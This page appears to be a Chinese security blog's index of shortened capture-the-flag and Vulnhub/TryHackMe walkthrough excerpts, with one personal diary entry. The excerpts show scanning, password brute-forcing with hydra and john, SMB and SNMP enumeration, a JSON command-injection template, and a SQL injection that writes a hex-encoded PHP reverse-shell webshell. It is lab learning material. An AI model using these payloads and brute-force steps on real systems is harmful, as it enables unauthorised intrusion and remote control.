MikannseのSekai

在打vulnhub之后遇到了许多靶机导入vmware并且在kali和靶机都开启了NAT之后kali仍然扫不到靶机ip的情况。尝试了许久了找到了解决方法。 开启靶机后来到这个界面，如果没有弹出这个界面。那就重启靶机，在vmware标志出来的瞬间按住Shift键，来到这个界面之后松开。按下“E”，来到以下界面 在最后一行，将”ro”或者”ro quite”改成rw signie init=/bin/bash。改完之后按Ctrl+x键进入bash 输入ip a查看网卡，看到物理网卡是ens33,并且没有分配到IP。 ubuntu和debian的网络配置文件在/etc/network/interfaces，centos似乎在/etc/sysconfig/network-scripts/ifcfg-eth0，我还没碰到过 nano /etc/network/interfaces 将虚拟网卡改成和物理网卡一致的名字。Ctrl+O，Ctrl+X保存退出 /etc/init.d/networking restart 重启服务 再次ip a查看 已经分配到IP，重启靶机，以正常方式启动 ...

主机发现sudo nmap -sn 192.168.162.0/24 端口扫描sudo nmap --min-rate 10000 -p- 192.168.162.129 sudo nmap -sT -sV -sC -O -p21,22,80,5000 192.168.162.129 Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-16 13:01 CSTNmap scan report for 192.168.162.129 (192.168.162.129)Host is up (0.00042s latency).PORT STATE SERVICE VERSION21/tcp open ftp vsftpd 3.0.3| ftp-syst: | STAT: | FTP server status:| Connected to ::ffff:192.168.162.128| Logged in as ftp| TYPE: ASCII| No sessio ...

端口扫描 SMB枚举了一下没东西，估计和上一台靶机不一样了 DNS照常添加hosts,三个域名都要添加。 开了53端口，是一个域服务器。试着挖掘一下DNS记录 dig windcorp.thm any @10.10.202.0 flag1 THM{Allowing nonsecure dynamic updates is a significant security vulnerability because updates can be accepted from untrusted sources} 提示:允许不安全的动态更新是一个重大的安全漏洞，因为可以从不受信任的来源接受更新 虽然不知道在说什么 Web主页进去右上角有一个登录界面 然而登录界面貌似有加密机制，不能直接爆破。扫一下目录，但是都扫出来的东西都没权限访问。这条路似乎走不通了。看看最后一个域名selfservice.dev.windcorp.thm的网站，提示正在建造，很有可能存在漏洞。 扫目录扫到一个backup目录，能够加载第一个证书，但是加密 pfx2john cert.pfx >hashjohn ...

端口扫描 开了好多端口诶 cat nmap |grep open |awk -F'/' '{print $1}' | tr '\n\r' ',' 可以用这个命令快速分割出端口号 Web先从80端口下手，访问发现是一个公司的网站，发现右上角有一个重置密码，但是登录不了，也许要添加DNS解析 在/etc/hosts文件里面添加 在重置的页面需要回答问题，还有用户名，我们在主页可以看到底下有三个用户，大概是员工。其中一个问题是最喜爱的宠物的名字，第二个用户抱着只狗，尝试下载图片。发现图片的名字是lilyleAndSparky,可能是她和她宠物的名字。发现重置成功。 重置后的密码是ChangeMe#1234，但是暂时还不知道哪里能登陆 SMB看到有SMB服务(149,445端口)，枚举一下 enum4linux -a 10.10.88.248 没发现东西，用一下smbmap smbmap -u lilyle -p ChangeMe#1234 -R -H windcorp.thm 找到一个名叫Shared共享，连接 smbclient -U lilyle //10.10.88.248/ ...

端口扫描主机发现 sudo nmap -sn 192.168.162.0/24 新增的192.168.162.144为待渗透靶机 竟然开了两个http服务？ web访问网页，发现了一段话，发现一个叫jaybeale的人名还有一个类似团队名inguardians 。 扫目录，发现有四个。robots.txt里面没东西，graffiti.txt里面有一个人名Morpheus 然后其他两个文件都没有权限访问。emmm然后80端口就下不去了。看看81端口，发现是一个登录界面,是get请求，也许可以获得的两个人名来爆破 新建一个users.txt里面输入两个人名 hydra -l users.txt -P /usr/share/wordlists/rockyou.txt 192.168.162.144 -s 81 http-get 发现爆破不出来，看看WP，发现扫目录竟然漏了一个目录，还有一个graffiti.php目录，看来-x参数还要加入php。 Getshell抓个包看看，发现有传参，但是貌似不能包含/etc/passwd，利用不了。试了一下也没有远程文件包含。但是发现messa ...

端口扫描主机发现 sudo nmap -sn 192.168.162.0/24 多出的.143就是要渗透的靶机 Web一共就开了两个端口，进80端口看看。就一张图片，看了一下没有什么隐写。扫一下目录 进robots.txt，提示了一个路径/~myfiles。进去一看404 看源码发现只是虚晃一枪。也就是说这个目录应该是存在的。但是也没有其他什么提示，也许myfiles只是一个提示，并不是真正的目录。 ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u 'http://192.168.162.143/~FUZZ 我们把myfiile替换看看，发现了一个secret 访问得知这个目录藏了一个ssh私钥，那我们还要爆破这个目录 然而用gobuster扫不到目录，看了下WP后发现竟然有个点。。。 ffuf -c -ic -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt ...

端口扫描 21端口FTP发现不能匿名登录 Web发现不能直接访问网站，先添加DNS解析 sudo vim /etc/hosts 扫下目录先 gobuster dir -u https://robyns-petshop.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -k 因为是私有证书，要加上-k忽略证书验证 在网站结尾发现pico这个关键词，搜了一下应该是一个CMS 但是搜了一下应该不是同一个东西，利用不了。 在这里发现这个IP对应的域名有好几个,应该是一个主域和几个备用域，试着把这四个都添加到hosts文件里 Getshell登录monitorr.robyns-petshop.thm,发现了另一个CMS，貌似是一个监管系统。剩下两个看了感觉没什么攻击点 wow,搜到的版本和网站下方的正好对应，加深了对这个思路的信心 searchsploit "Monitorr" -m php/webapps/48980.py 下载脚本 是一个RCE的脚本， ...

端口扫描 扫出来好多端口。然而web服务扫不出来什么端口，访问也只有一张图片而已。SMB也枚举不出来东西，myql和远程桌面也都没有信息可以连接。完全没有任何头绪啊（悲 看WP，扫描了他的UDP端口 sudo nmap 10.10.140.97 -sUV --top-ports 10 -Pn 而且还要加上–top-ports 10扫描是个最常用的端口，否则还扫不出来233。 snmp发现了个snmp，然后可以用onesixtyone这个工具对他进枚举。snmp是一个对网络设备管理的服务，采取的是UDP协议。 onesixtyone 10.10.140.97 -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt 发现了一个叫做openview的社区名 snmp-check 10.10.88.208 -c openview 然后用snmp-check这个工具枚举一下这个社区名，发现了一个非默认的用户名 Getshell 之前我们发现5985端口开启，是一个winr ...

唔，竟然又过了一个月么。果然放假过得时间就是快，原本计划有好多事情打算做的，然而却因为学车完全没有时间（悲。学车真的是又无聊又浪费时间啊。所幸的事顺利通过了科目二和三，也就算了。在学车的过程中把《万延元年的FOOTBALL》看完了，又两三天把《献给阿尔吉农的花束》一口气看完了，真不错捏。倒是觉得对知识和智力的过分追求并不全是好事。又重新开始投入时间到编曲上了，真是有意思，但是还是碰到了很多问题呢，不过解决的过程也学到了很多东西。这一个月渗透测试的素养和水平可谓是大幅度提升的，与其说是知识上的增长，不如说是开始刷靶机后建立起了基础的整个渗透的框架和思路，将之前所学的零碎的知识点整合了起来。虽然对于域渗透和二进制方面暂时学得还有点吃力，打算补一些基础知识，但是渗透真的是有趣，一天不打靶机就浑身难受。假期的下一个月打算往渗透测试靶机开发的方面学习一下，能对一些背后的原理更加了解。嗯。但是不得不说最近又有一种虚无感了呢，大概是基本没出门的原因吧，八月份要好好地享受这个大一的暑假出去转转呢。过于追求做事的效率也不太好吧，反而欲速则不达，也失去了本身做这件事的乐趣~

端口扫描 Web 获取了一些目录，但是里面也没什么有用的东西。找不到什么其他的了，那就抓个包看一下 发现有个cookie，照常理来说没有账号身份验证什么的为什么会有cookie呢。 一开始的想法是能不能伪造cookie，但是没有其他任何信息，伪造不了，任意更改cookie后会提示错误的序号，也许存在一个数据库查询，输入一个’后报错。 ordery by 发现只有两列 有回显了，数据库名称叫webapp 表名就叫queue 有两个列，一个ID一个序号 成功得到所有用户的ID和序号，也许我们就能伪造成其他用户了 嘶，但事实上证明拿到这些并没有什么用… 就算伪造也只有几号的界面罢了。。。 不会了，WP！！ GetshellWP的方法是用SQL注入来写马到Web目录然后反弹shell ' INTO OUTFILE '/var/www/html/shell.php' LINES TERMINATED BY 0x3C3F706870206578656328222F62696E2F62617368202D63202762617368202D69203E202F6465762F7463 ...

端口扫描 Web 根目录是一些介绍，我们进入/admin，发现要登录，试了个admin:admin给了个提示说密码是个很重要的字母，后面跟2个数字和一个特殊字符 并且抓包发现密码是会被加密上传的，而且加密形式应该是MD5 密码爆破接下来我们要猜测密码了，既然他都给了提示。用户名应该是marco,提示估计也是在网页中寻找，可以用cewl工具来收集网页中的信息然后生成密码字典 cewl -w list.txt -d 5 -m 5 http://10.10.211.133/ 生成一个list字典，有大小写的区分，不过猜测房间应该不会难为我们，就先全转成小写的 vim lower.py 生成字典，我们可以用john 先编辑john的配置文件 sudo vim /etc/john/john.conf Shift＋G跳转到文本底部，添加上自定义的规则 [List.Rules:PigRule]Az"[0-9][0-9][!?#$%&/()=]" john --wordlist=listlower.txt --rules=PigRule --stdout>pass.txt ...

端口扫描 只有一个Web端口还有SMB服务 SMB因为Web进去发现要登录，我们现在又没有任何信息，所以先转向SMB。 enum4linux -a ip 发现一个共享但是无法访问 发现了两个用户，然后也就没什么信息了。 Web我们继续转到80端口，有了用户名，没其他信息，只能试着爆破了 发现登录框是GET请求，那用hydra的方式应该和之前POST表单不太一样 fox用户爆不出来，rascal可以 hydra -l rascal -P /usr/share/wordlists/rockyou.txt 10.10.88.192 http-get 貌似每次开启靶机的密码都不一样 发现是一个搜索系统 发现我们搜索的东西是以JSON类型上传的 而且他给我们显示了三个文件 抓包放到bp的重放器中，可以看到这个搜索的功能是在search.php执行的，我们可以猜测是一个命令执行语句 然后不会了，看WP！用的是JSON注入 上传类似于 {"target":"\";要执行的命令;\""} 想了好久，不太懂，在这位师傅写的文章理解了 https://blog.csdn.net/qq ...